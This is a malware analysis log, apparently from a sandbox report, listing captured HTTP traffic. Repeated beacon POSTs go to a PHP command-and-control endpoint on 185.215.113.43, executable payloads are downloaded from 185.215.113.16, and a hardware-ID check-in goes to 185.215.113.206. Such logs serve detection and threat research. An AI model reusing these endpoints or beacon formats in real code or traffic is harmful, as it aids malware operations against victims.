Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 16:30:26 GMTIf-None-Match: "6728f6a2-2d7000"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 39 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003900001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 16:30:39 GMTIf-None-Match: "6728f6af-206a00"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="build"tale------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 39 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003901001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 15:50:39 GMTIf-None-Match: "6728ed4f-e0800"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 39 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003902001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 04 Nov 2024 15:51:04 GMTIf-None-Match: "6728ed68-2aa800"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 39 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003903001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 42 43 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"EBBC843EB3592398989009------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"tale------IEHDAFHDHCBFIDGCFIDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
